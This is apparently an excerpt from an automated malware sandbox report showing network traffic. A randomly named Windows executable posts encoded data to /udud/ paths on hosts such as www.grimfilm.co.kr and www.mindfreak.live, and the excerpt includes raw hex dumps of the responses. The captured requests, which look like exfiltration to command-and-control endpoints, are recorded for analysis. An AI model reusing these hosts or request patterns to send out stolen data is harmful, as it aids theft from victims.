                                                                                                Data Raw: 63 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bc 19 4b 8f db c6 f9 9c fd 15 b3 0c ba 22 6d 92 22 25 ed 8b 5a da 48 1c a7 69 9b d4 81 1f 29 5a ef 22 18 91 23 69 bc 14 87 99 19 ae 76 23 0b c8 a1 28 7a 08 7a 49 81 e6 d0 1c 8b 5e 7b e8 a1 87 a0 3f a8 71 fe 43 bf 19 52 22 25 51 bb b1 bd 88 13 50 e4 cc f7 9a ef fd cd 9e ec 7e f0 e8 c1 d3 df 7f fa 10 8d e5 24 b9 b7 73 a2 7e 50 82 d3 51 68 9c 33 e7 37 8f 0d b5 46 70 7c 6f e7 9d 93 09 91 18 45 63 cc 05 91 a1 f1 ec e9 87 ce 91 81 da cb 9d 14 4f 48 68 5c 50 32 cd 18 97 06 8a 58 2a 49 0a 90 53 1a cb 71 18 93 0b 1a 11 47 7f d8 88 a6 54 52 9c 38 22 c2 09 09 7d 4d a7 46 a6 c5 d9 80 49 d1 5a 12 69 4d f0 a5 43 27 78 44 9c 8c 13 c5 24 48 30 1f 91 96 46 94 54 26 e4 de 8f 7f f9 f6 d5 77 ff 7e f5 cf af 7e f8 c7 f7 e8 d5 bf fe fb ea bb 3f a2 57 7f fe 16 bd fa db 9f 5e 7d f7 35 da 7b f7 a8 e3 fb 7d 24 d9 04 4b b6 7f dc 3b 3a 69 17 88 3b 27 09 4d cf 11 27 49 d8 8a 53 a1 38 0c 89 8c c6 2d 34 86 b7 b0 d5 6e 8f 38 9d 0c 69 32 71 23 e6 9e f3 82 e9 12 c7 c0 89 24 3c c5 92 18 48 [TRUNCATED]
                                                                                                Data Ascii: cf0K"m"%ZHi)Z"#iv#(zzI^{?qCR"%QP~$s~PQh37Fp|oEcOHh\P2X*ISqGTR8"}MFIZiMC'xD$H0FT&w~~?W^}5{}$K;:i;'M'IS8-4n8i2q#$<H^ee,ms!^NRBb8"g}_7c,e&u!!qe?|O bB%3iLHI@!,3AI}e|t&@F>mvOir)|DM~M}Gf(O5UMC(c8;B <<p1wwv1h8p`;aFz&Skv9bI"X3g"T=%BNOL}-'9y44y_!8hPd<+$)-k|dCFH:KS)h*8W&qG 2#i7@2Z&H\gM!.V|`1JGDTd<>Fxy1<ablYw`wl<UX{{9yk~4
                                                                                                May 27, 2024 12:32:55.841655970 CEST1289INData Raw: b7 64 5f 03 5e 5b e9 6c ac ec 6f ac 90 9b e9 00 6b ab af 4d 50 e6 85 c2 06 b5 93 c6 0a ac 73 b0 d4 fe c0 1f 18 0d 5b 83 72 cb 9a 97 14 fc ca ea c3 85 d5 55 50 f0 d0 c8 d3 98 0c 69 4a 62 63 37 54 99 9d 0d d1 ef 18 3f 27 fc 97 09 1b e0 e4 49 c4 32
                                                                                                Data Ascii: d_^[lokMPs[rUPiJbc7T?'I2'H2RF ??!O>jv==+.,CxMdq?P=B<^CN>ve{I;dxvKd!7,&hD1$~86/KG!(
                                                                                                May 27, 2024 12:32:55.841670990 CEST1117INData Raw: 81 7a b7 24 d0 06 9d 37 15 68 ff 96 04 da a0 f3 a6 02 1d dc 92 40 1b 74 de 4c a0 19 67 12 ba ab c0 3f f2 62 32 9a ef ec bc 03 ff aa ea 89 61 90 e4 54 9c 07 03 02 9d 34 41 33 bd ff ce 22 bf a2 56 ab 5f ac 14 7d 02 f2 dd 7d 4e 26 e5 5a d9 4b a0 6e
                                                                                                Data Ascii: z$7h@tLg?b2aT4A3"V_}}N&ZKnTE}iH]""::{stlj*Dh)~i>}.\{ R?POpc`=~w z>OG.{Y;^P_J#;v@hR
                                                                                                May 27, 2024 12:32:55.841732025 CEST1289INData Raw: 31 33 36 63 0d 0a c4 5d 6d 8f e3 b8 91 fe 9c fc 0a 62 1a 07 b4 e6 64 43 92 25 d9 ee c6 05 b7 3b 8b 04 fb e1 ee 80 4c f2 e9 32 18 c8 96 ec 16 c6 6d fb 64 bb 5f d6 e8 ff 7e 55 45 52 a2 28 4a a2 65 6f 32 3d fd 62 aa f8 14 59 2a b2 8a c5 a2 64 72 99
                                                                                                Data Ascii: 136c]mbdC%;L2md_~UER(Jeo2=bY*dr'z~Dxr^9T#.~f|JJoaLM=n9Ckjz!KNA7Xx9dmnr9j({b7W>>:47Ox)_`_sZTIw=
                                                                                                May 27, 2024 12:32:55.841872931 CEST1289INData Raw: 02 33 c9 82 ac 67 26 f7 f1 e4 ee a2 58 94 d5 a3 0e a6 1e 89 18 68 d3 d4 a4 69 ca 3b 89 21 45 c5 eb 6a f6 8e 82 2a fa 47 0e 12 86 61 19 d4 e0 01 96 da a8 7c 54 d3 7b 29 cc 05 46 bd b6 35 2e 76 cf cb 55 14 5c 67 c1 04 b7 0e 43 c3 fe 18 b1 c6 d8 5a
                                                                                                Data Ascii: 3g&Xhi;!Ej*Ga|T{)F5.vU\gCZTlt=pA'lF_\IV@^mkm>/DBZbV@eIHNyC$A)9Xr,?U;EU>G<jbu]1+vaf[xwT7Zz`&+j(5Iy\
                                                                                                May 27, 2024 12:32:55.841886044 CEST1289INData Raw: 55 97 7d a5 e7 4c f0 42 7c ec 0d f6 92 ae 73 e8 2f b8 96 62 f4 e0 12 a0 a5 fe ff fd d7 c6 e7 af ef cf 8b dd 46 eb 07 46 b2 31 75 8e a6 13 bf 39 34 ca eb 81 87 39 73 db 7b 5f ea d5 cb ab ae 30 25 ed 44 d0 4a 1d 9c 74 d0 86 82 36 24 ca a8 83 32 12
                                                                                                Data Ascii: U}LB|s/bFF1u949s{_0%DJt6$2@u Mm<g<"xMe8hfD}glY#@?U?|o,Cg&1cgVw,Cp#uC,y_1mSdv7pnjr"W`"q
                                                                                                May 27, 2024 12:32:55.841996908 CEST1113INData Raw: 68 22 a3 d8 0e 89 13 b7 a3 d8 f6 4f 92 b7 23 d9 f6 4d 92 b7 23 85 97 21 85 ed 48 d1 65 48 91 49 33 c9 9e f5 9f 48 be 81 95 bb 86 89 b5 ed bb 86 49 bf 45 bc 06 dd ce 4e 5e c3 e1 72 eb 79 0d b7 ab 6c ea 0d 19 5b 5b da ab 78 0e b0 bf d7 f0 bb dc 2a
                                                                                                Data Ascii: h"O#M#!HeHI3HIEN^ryl[[x*_b[}-5Zn[{gp}Mxtk}=w!7Nn(!eWnMZ$"\\k1_c}L.-){|>5]\a
                                                                                                May 27, 2024 12:32:55.842012882 CEST1289INData Raw: 62 64 63 0d 0a ec 1d 6b 6f 1b c7 f1 b3 f8 2b 16 5b 34 92 11 f3 8e 47 52 0f 2b 24 93 a6 8d d1 a2 31 52 24 7d 7d 10 20 50 7c 58 67 1f 79 57 1e 29 5a 71 0c a8 89 12 38 b6 d1 a4 80 15 ab 41 64 38 80 fb 08 ea a2 72 ad a6 02 fa f8 41 e2 e9 3f 74 66 76
                                                                                                Data Ascii: bdcko+[4GR+$1R$}} P|XgyW)Zq8Ad8rA?tfvxe6 2vvw3{;anx4QGt0klf!g'4SOC$fegLt;.F*i`&9G~Hi$qR;)yi`'u#,(
                                                                                                May 27, 2024 12:32:55.842041016 CEST1289INData Raw: c7 c9 9e 4e 71 3c 59 d8 02 62 08 28 26 e1 38 75 97 f9 14 5d ce 64 e8 cf 4c ea 9e ed 7e 8a 9e 8d a4 9e ed be e8 79 a6 e4 8c f4 17 9e 2a 80 51 5a 4d 34 f9 c0 38 c4 c3 58 60 c8 ad ba 0d ab c9 a5 71 6a b7 a0 2a c8 1d 8c bd f9 0b c5 a5 92 5e 85 05 d8
                                                                                                Data Ascii: Nq<Yb(&8u]dL~y*QZM48X`qj*^KvnT$C&CnZ,4b)-cLU*#nwk<dQ,Q*s<VvY2l|f2vxEx_gs(w0onX*G6s:j<'nh*y?v;&xX
                                                                                                May 27, 2024 12:32:55.842094898 CEST465INData Raw: 65 27 45 ab 17 72 39 5e f1 3e b9 73 b4 ff 15 d8 25 79 1f 8f 21 74 52 33 6d 3a 9e 2c 4d e4 89 6f be 62 e4 2a 15 35 b8 a1 10 ac 79 8a 2f 5c d9 10 c6 41 f7 91 08 97 aa d2 44 ca d4 a7 f3 a6 0e 64 09 31 80 5e ea 59 27 20 57 d1 db ea 6a 18 70 38 2d 6e
                                                                                                Data Ascii: e'Er9^>s%y!tR3m:,Mob*5y/\ADd1^Y' Wjp8-nppObjX}Ix<TYPBN=F:$Q~g8Q*2_TJ{e!z}q0B|tu8pZH8s5;.>x?~Mrlg
                                                                                                May 27, 2024 12:32:55.845786095 CEST501INData Raw: 31 64 61 0d 0a 7c 5d bd 4e c3 30 10 9e e9 53 1c 62 48 5a b5 c9 03 54 30 40 11 aa d4 8d be 80 db 38 25 55 70 90 93 aa 30 20 b1 b0 33 30 30 c2 1b 74 64 e1 85 a0 bc 03 df 39 ce 4f d3 94 a5 49 dc b3 ef fb 7c 97 e8 64 df 25 cd d4 fa 7c aa 5b ea 59 96
                                                                                                Data Ascii: 1da|]N0SbHZT0@8%Up0 300td9OI|d%|[Y@@]Wli]S'@rj{J7/6LKk8/!CT"4h&L@!.7!v*KT~GWn$8+/ku/RK0NL\DJq\ey_Sr


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                23192.168.11.3049853183.111.161.243807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:32:58.220835924 CEST1682OUTPOST /udud/ HTTP/1.1
                                                                                                Host: www.grimfilm.co.kr
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.grimfilm.co.kr
                                                                                                Referer: http://www.grimfilm.co.kr/udud/
                                                                                                Content-Length: 1141
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Raw: 50 6c 39 50 38 6c 64 58 3d 52 31 4a 2f 6c 6b 76 6f 6c 57 78 79 31 63 53 36 2b 4e 63 46 4d 52 6a 61 4d 67 59 76 62 6d 6d 44 71 52 36 42 5a 57 2b 72 6a 6f 61 30 62 6b 41 74 45 63 77 69 32 4a 4d 37 56 33 59 64 69 6f 55 78 58 4a 59 46 64 67 71 36 62 36 72 49 6f 4e 63 75 6a 56 53 76 50 6e 6d 31 34 59 70 45 6f 57 4f 37 45 6a 4a 44 6b 2f 4c 59 71 2b 46 6e 43 4b 2f 30 7a 76 49 65 6d 72 78 4d 46 53 2f 68 69 39 69 57 34 61 74 6a 65 69 67 4f 67 4c 65 75 7a 53 6a 6d 4d 55 75 47 75 6a 78 2f 47 4b 55 55 6a 56 4b 4a 79 42 73 55 4e 44 72 49 49 79 69 4e 79 52 67 55 6d 4f 6f 54 78 50 4d 62 62 77 37 4c 64 38 42 48 43 49 36 50 4f 69 5a 56 37 51 37 34 5a 55 4f 36 48 72 4c 4c 70 34 37 33 7a 4e 72 69 45 61 72 4c 30 41 6e 72 7a 49 33 7a 37 32 43 61 34 46 4f 49 36 78 7a 63 38 67 52 49 69 48 67 6b 68 55 53 2f 6c 6a 39 37 63 4b 35 70 4a 6d 49 52 52 62 74 4c 6c 4e 38 37 74 53 67 4c 69 48 67 54 33 4d 71 79 71 71 54 34 6c 62 35 41 48 79 6f 42 53 79 44 56 62 70 55 57 37 33 2f 62 6d 36 33 59 74 79 42 2b 31 6f 66 76 49 34 78 43 44 [TRUNCATED]
                                                                                                Data Ascii: Pl9P8ldX=R1J/lkvolWxy1cS6+NcFMRjaMgYvbmmDqR6BZW+rjoa0bkAtEcwi2JM7V3YdioUxXJYFdgq6b6rIoNcujVSvPnm14YpEoWO7EjJDk/LYq+FnCK/0zvIemrxMFS/hi9iW4atjeigOgLeuzSjmMUuGujx/GKUUjVKJyBsUNDrIIyiNyRgUmOoTxPMbbw7Ld8BHCI6POiZV7Q74ZUO6HrLLp473zNriEarL0AnrzI3z72Ca4FOI6xzc8gRIiHgkhUS/lj97cK5pJmIRRbtLlN87tSgLiHgT3MqyqqT4lb5AHyoBSyDVbpUW73/bm63YtyB+1ofvI4xCDo5UOkjNznP8+KOZVCC3uu2PaBAabWBQ5lV2NrUjAVAoLgAqYRmAl1ACuDY5IVyA2dMSOM/bPGFeABNrfgmJsWtm8f6qLL9xW42VJY+NTIbnbnwryxvmt+EFF1P4zSmyU3YdiKdjbtD4Wl8qYNSpOXjvXhn6Fuo9CUdfsypIJSi/AfZlO6yyKUCUvuB/tgxQ2aXKRPKOvS0NNMn1dHyTVewMi4Fahl+w51i1jpMXTUoDdjnujMV+/kVE1bk7NX//uRWxUVGe6fuGsq1FzFGkqGScc57OEUhjMCLIOTU39JKXFFH/DOP2PvHtScfjxD46v6Ky1hIMvZLQhNrQ+aJjmigdcOVc3Z54vXFfmpHvJ2aAVjDLO5bgvnbAzhc1zLNJx1Zw/YoGtMNPlPOkEqxJ2csks3wpFGi9C6OSAJnk/UlUZC+hEmW1uyXRWaEc5IjvD8kZ3llbwXozCFOzvuzwm7tE+rLTrUkPOnQFzUmQh2uTDvqA586Ykzba4vvjCezY8v5ukIaUQbddgzWJblUbyAFPLBE8djf+zXEpvFcEm1yod+vXrWft3pIWddsRfWsEu7znERa31ZNsNFQAgj4xs834uoQqesNJncBcou0gDrNmN2lcYRu8WT6sfa309iHoLQr/AT5DtMaGKiIqScpxsw9D9yCF/Xadk1c [TRUNCATED]
                                                                                                May 27, 2024 12:32:58.662247896 CEST1289INHTTP/1.1 404 Not Found
                                                                                                Server: openresty
                                                                                                Date: Mon, 27 May 2024 10:32:58 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Vary: Accept-Encoding
                                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                Link: <https://grimfilm.co.kr/wp-json/>; rel="https://api.w.org/"
                                                                                                Content-Encoding: gzip
                                                                                                Data Raw: 63 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bc 19 4b 8f db c6 f9 9c fd 15 b3 0c ba 22 6d 92 22 25 ed 8b 5a da 48 1c a7 69 9b d4 81 1f 29 5a ef 22 18 91 23 69 bc 14 87 99 19 ae 76 23 0b c8 a1 28 7a 08 7a 49 81 e6 d0 1c 8b 5e 7b e8 a1 87 a0 3f a8 71 fe 43 bf 19 52 22 25 51 bb b1 bd 88 13 50 e4 cc f7 9a ef fd cd 9e ec 7e f0 e8 c1 d3 df 7f fa 10 8d e5 24 b9 b7 73 a2 7e 50 82 d3 51 68 9c 33 e7 37 8f 0d b5 46 70 7c 6f e7 9d 93 09 91 18 45 63 cc 05 91 a1 f1 ec e9 87 ce 91 81 da cb 9d 14 4f 48 68 5c 50 32 cd 18 97 06 8a 58 2a 49 0a 90 53 1a cb 71 18 93 0b 1a 11 47 7f d8 88 a6 54 52 9c 38 22 c2 09 09 7d 4d a7 46 a6 c5 d9 80 49 d1 5a 12 69 4d f0 a5 43 27 78 44 9c 8c 13 c5 24 48 30 1f 91 96 46 94 54 26 e4 de 8f 7f f9 f6 d5 77 ff 7e f5 cf af 7e f8 c7 f7 e8 d5 bf fe fb ea bb 3f a2 57 7f fe 16 bd fa db 9f 5e 7d f7 35 da 7b f7 a8 e3 fb 7d 24 d9 04 4b b6 7f dc 3b 3a 69 17 88 3b 27 09 4d cf 11 27 49 d8 8a 53 a1 38 0c 89 8c c6 2d 34 86 b7 b0 d5 6e 8f 38 9d 0c 69 32 71 23 e6 9e f3 82 e9 12 c7 c0 89 24 3c c5 92 18 48 [TRUNCATED]
                                                                                                Data Ascii: cf0K"m"%ZHi)Z"#iv#(zzI^{?qCR"%QP~$s~PQh37Fp|oEcOHh\P2X*ISqGTR8"}MFIZiMC'xD$H0FT&w~~?W^}5{}$K;:i;'M'IS8-4n8i2q#$<H^ee,ms!^NRBb8"g}_7c,e&u!!qe?|O bB%3iLHI@!,3AI}e|t&@F>mvOir)|DM~M}Gf(O5UMC(c8;B <<p1wwv1h8p`;aFz&Skv9bI"X3g"T=%BNOL}-'9y44y_!8hPd<+$)-k|dCFH:KS)h*8W&qG 2#i7@2Z&H\gM!.V|`1JGDTd<>Fxy1<ablYw`wl<UX{{9yk~4
                                                                                                May 27, 2024 12:32:58.662327051 CEST1289INData Raw: b7 64 5f 03 5e 5b e9 6c ac ec 6f ac 90 9b e9 00 6b ab af 4d 50 e6 85 c2 06 b5 93 c6 0a ac 73 b0 d4 fe c0 1f 18 0d 5b 83 72 cb 9a 97 14 fc ca ea c3 85 d5 55 50 f0 d0 c8 d3 98 0c 69 4a 62 63 37 54 99 9d 0d d1 ef 18 3f 27 fc 97 09 1b e0 e4 49 c4 32
                                                                                                Data Ascii: d_^[lokMPs[rUPiJbc7T?'I2'H2RF ??!O>jv==+.,CxMdq?P=B<^CN>ve{I;dxvKd!7,&hD1$~86/KG!(
                                                                                                May 27, 2024 12:32:58.662344933 CEST1117INData Raw: 81 7a b7 24 d0 06 9d 37 15 68 ff 96 04 da a0 f3 a6 02 1d dc 92 40 1b 74 de 4c a0 19 67 12 ba ab c0 3f f2 62 32 9a ef ec bc 03 ff aa ea 89 61 90 e4 54 9c 07 03 02 9d 34 41 33 bd ff ce 22 bf a2 56 ab 5f ac 14 7d 02 f2 dd 7d 4e 26 e5 5a d9 4b a0 6e
                                                                                                Data Ascii: z$7h@tLg?b2aT4A3"V_}}N&ZKnTE}iH]""::{stlj*Dh)~i>}.\{ R?POpc`=~w z>OG.{Y;^P_J#;v@hR
                                                                                                May 27, 2024 12:32:58.662535906 CEST1289INData Raw: 66 65 36 0d 0a bc 5c 6d 6f e3 b8 11 fe 7c fd 15 c4 06 05 a2 ad 6c e8 dd 2f 41 0f dd db c3 15 f7 a1 2d d0 ed 7d 6a 17 0b d9 92 13 63 1d db 90 ed 64 73 46 fe 7b 67 86 a4 44 51 94 44 cb d9 db 6c 5e 2c 0d 9f 19 8e 86 9c e1 70 28 53 c8 a4 66 3d 31 f2
                                                                                                Data Ascii: fe6\mo|l/A-}jcdsF{gDQDl^,p(Sf=1$#;'S(alua,{,p6$i=:vY:V~jdt e8`Z;CX6FOtMyb@ww0k.C*>yB
                                                                                                May 27, 2024 12:32:58.662710905 CEST1289INData Raw: 2e f7 f1 e4 ee a2 58 94 d5 b3 0e a6 1e 89 1c 68 d3 d5 64 59 c6 3b 89 29 45 25 ea 6a f6 8e 92 2a fa 47 0e 12 45 51 99 d4 e0 09 96 da a8 bc 53 cb 7b 29 cd 05 4e bd b6 35 2e 76 cf cb 55 14 dc 67 41 88 5b 87 91 61 7f 8c 58 63 6e 2d 2e 77 36 09 ba 9e
                                                                                                Data Ascii: .XhdY;)E%j*GEQS{)N5.vUgA[aXcn-.w6zrG6_2y.)Wk!WU27(A|Bk/Z"U!ZbV@,?bihN9Ssruj}*rjbu[^cW(aMVtSjr\;G
                                                                                                May 27, 2024 12:32:58.662730932 CEST1289INData Raw: d7 de 60 2f e9 3e 87 fe 88 6b 29 46 2f 2e 01 5a ea ff 6f bf 36 3e 7f 7a 79 5c ec 36 5a 3f 30 93 8d a5 73 34 9d f8 cd a1 51 de 0f 3c ac 99 db de fa d2 ae 9e 9e 75 83 29 69 43 41 2b 6d 30 ec a0 8d 04 6d 44 94 71 07 65 2c 28 13 81 3a ed a0 4d a4 b4
                                                                                                Data Ascii: `/>k)F/.Zo6>zy\6Z?0s4Q<u)iCA+m0mDqe,(:M M2Py?f<j32|>3Zb_q6m,zQ(10d$8,S:hIGn0Hl>Kefg,T"{zgZ Xhkd
                                                                                                May 27, 2024 12:32:58.662790060 CEST1125INData Raw: f2 76 24 db be 49 f2 76 a4 e8 32 a4 a8 1d 29 be 0c 29 36 59 26 f9 b3 fe 13 c9 6f e0 e5 ae 61 62 ed fb ae 61 d2 ef 11 af 41 b7 f3 93 d7 70 b8 dc 7b 5e c3 ed 2a 9f fa 86 8c ad 3d ed 55 3c 07 f8 df 6b f8 5d ee 95 af e1 76 b1 af be 86 d9 85 1e fc 7a
                                                                                                Data Ascii: v$Iv2))6Y&oabaAp{^*=U<k]vzV~no-r.2x}wGo~gt19[c1pdeL2y@,2u1c!5p<b038c] |WUrgkVZi
                                                                                                May 27, 2024 12:32:58.662842035 CEST1289INData Raw: 62 64 63 0d 0a ec 1d 6b 6f 1b c7 f1 b3 f8 2b 16 5b 34 92 11 f3 8e 47 52 0f 2b 24 93 a6 8d d1 a2 31 52 24 7d 7d 10 20 50 7c 58 67 1f 79 57 1e 29 5a 71 0c a8 89 12 38 b6 d1 a4 80 15 ab 41 64 38 80 fb 08 ea a2 72 ad a6 02 fa f8 41 e2 e9 3f 74 66 76
                                                                                                Data Ascii: bdcko+[4GR+$1R$}} P|XgyW)Zq8Ad8rA?tfvxe6 2vvw3{;anx4QGt0klf!g'4SOC$fegLt;.F*i`&9G~Hi$qR;)yi`'u#,(
                                                                                                May 27, 2024 12:32:58.662874937 CEST1289INData Raw: c7 c9 9e 4e 71 3c 59 d8 02 62 08 28 26 e1 38 75 97 f9 14 5d ce 64 e8 cf 4c ea 9e ed 7e 8a 9e 8d a4 9e ed be e8 79 a6 e4 8c f4 17 9e 2a 80 51 5a 4d 34 f9 c0 38 c4 c3 58 60 c8 ad ba 0d ab c9 a5 71 6a b7 a0 2a c8 1d 8c bd f9 0b c5 a5 92 5e 85 05 d8
                                                                                                Data Ascii: Nq<Yb(&8u]dL~y*QZM48X`qj*^KvnT$C&CnZ,4b)-cLU*#nwk<dQ,Q*s<VvY2l|f2vxEx_gs(w0onX*G6s:j<'nh*y?v;&xX
                                                                                                May 27, 2024 12:32:58.662889957 CEST465INData Raw: 65 27 45 ab 17 72 39 5e f1 3e b9 73 b4 ff 15 d8 25 79 1f 8f 21 74 52 33 6d 3a 9e 2c 4d e4 89 6f be 62 e4 2a 15 35 b8 a1 10 ac 79 8a 2f 5c d9 10 c6 41 f7 91 08 97 aa d2 44 ca d4 a7 f3 a6 0e 64 09 31 80 5e ea 59 27 20 57 d1 db ea 6a 18 70 38 2d 6e
                                                                                                Data Ascii: e'Er9^>s%y!tR3m:,Mob*5y/\ADd1^Y' Wjp8-nppObjX}Ix<TYPBN=F:$Q~g8Q*2_TJ{e!z}q0B|tu8pZH8s5;.>x?~Mrlg
                                                                                                May 27, 2024 12:32:58.666464090 CEST501INData Raw: 31 64 61 0d 0a 7c 5d bd 4e c3 30 10 9e e9 53 1c 62 48 5a b5 c9 03 54 30 40 11 aa d4 8d be 80 db 38 25 55 70 90 93 aa 30 20 b1 b0 33 30 30 c2 1b 74 64 e1 85 a0 bc 03 df 39 ce 4f d3 94 a5 49 dc b3 ef fb 7c 97 e8 64 df 25 cd d4 fa 7c aa 5b ea 59 96
                                                                                                Data Ascii: 1da|]N0SbHZT0@8%Up0 300td9OI|d%|[Y@@]Wli]S'@rj{J7/6LKk8/!CT"4h&L@!.7!v*KT~GWn$8+/ku/RK0NL\DJq\ey_Sr


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                24192.168.11.3049854183.111.161.243807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:33:01.067776918 CEST479OUTGET /udud/?Pl9P8ldX=c3hfmT3ov0JTxeaB3Np5dAzfMERgbCa9qyeMZ0b4or2kTnd0L4sYzpUTGn0LvbcUe5EAajqxEazp9el6mHCoSAKD4KRQ5UefbhtvnOrVvch9BM72k+FCmqI=&UJ2H=ED2dW8S8UxwlG HTTP/1.1
                                                                                                Host: www.grimfilm.co.kr
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:33:01.504887104 CEST475INHTTP/1.1 301 Moved Permanently
                                                                                                Server: openresty
                                                                                                Date: Mon, 27 May 2024 10:33:01 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Content-Length: 0
                                                                                                Connection: close
                                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                X-Redirect-By: WordPress
                                                                                                Location: http://grimfilm.co.kr/udud/?Pl9P8ldX=c3hfmT3ov0JTxeaB3Np5dAzfMERgbCa9qyeMZ0b4or2kTnd0L4sYzpUTGn0LvbcUe5EAajqxEazp9el6mHCoSAKD4KRQ5UefbhtvnOrVvch9BM72k+FCmqI=&UJ2H=ED2dW8S8UxwlG


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                25192.168.11.30498553.64.163.50807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:33:06.969628096 CEST745OUTPOST /udud/ HTTP/1.1
                                                                                                Host: www.mindfreak.live
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.mindfreak.live
                                                                                                Referer: http://www.mindfreak.live/udud/
                                                                                                Content-Length: 205
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Raw: 50 6c 39 50 38 6c 64 58 3d 55 43 38 76 66 42 69 72 50 6a 49 6b 6f 62 44 4a 74 64 31 54 69 57 70 35 51 48 53 62 4e 49 30 4a 77 39 36 32 72 4c 52 6b 42 75 67 6f 57 48 30 70 41 33 57 6b 2b 46 79 44 37 52 48 51 45 6d 47 46 6e 6a 78 76 31 76 36 6a 51 78 56 49 63 68 38 6a 47 5a 4d 57 7a 67 4a 58 64 6e 6e 46 73 72 2f 35 68 4b 6b 56 45 4b 32 56 6d 4b 6b 7a 74 62 46 6b 58 34 7a 49 6c 6f 30 73 39 65 5a 48 69 4a 73 42 31 57 78 37 66 6d 5a 6d 4d 41 5a 79 4a 35 41 63 56 47 35 59 61 71 76 6f 59 4e 72 34 42 78 30 65 49 5a 58 59 6a 6d 48 73 6b 62 33 79 50 49 4c 55 4f 51 77 56 61 48 5a 63 50 36 47 39 72 52 30 34 37 77 3d 3d
                                                                                                Data Ascii: Pl9P8ldX=UC8vfBirPjIkobDJtd1TiWp5QHSbNI0Jw962rLRkBugoWH0pA3Wk+FyD7RHQEmGFnjxv1v6jQxVIch8jGZMWzgJXdnnFsr/5hKkVEK2VmKkztbFkX4zIlo0s9eZHiJsB1Wx7fmZmMAZyJ5AcVG5YaqvoYNr4Bx0eIZXYjmHskb3yPILUOQwVaHZcP6G9rR047w==
                                                                                                May 27, 2024 12:33:07.156255007 CEST292INHTTP/1.1 410 Gone
                                                                                                Server: openresty
                                                                                                Date: Mon, 27 May 2024 10:33:07 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 65 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 6e 64 66 72 65 61 6b 2e 6c 69 76 65 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 7<html>9 <head>4e <meta http-equiv='refresh' content='0; url=http://www.mindfreak.live/' />a </head>8</html>0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                26192.168.11.30498563.64.163.50807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:33:09.690677881 CEST765OUTPOST /udud/ HTTP/1.1
                                                                                                Host: www.mindfreak.live
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.mindfreak.live
                                                                                                Referer: http://www.mindfreak.live/udud/
                                                                                                Content-Length: 225
                                                                                                Cache-Control: max-age=0
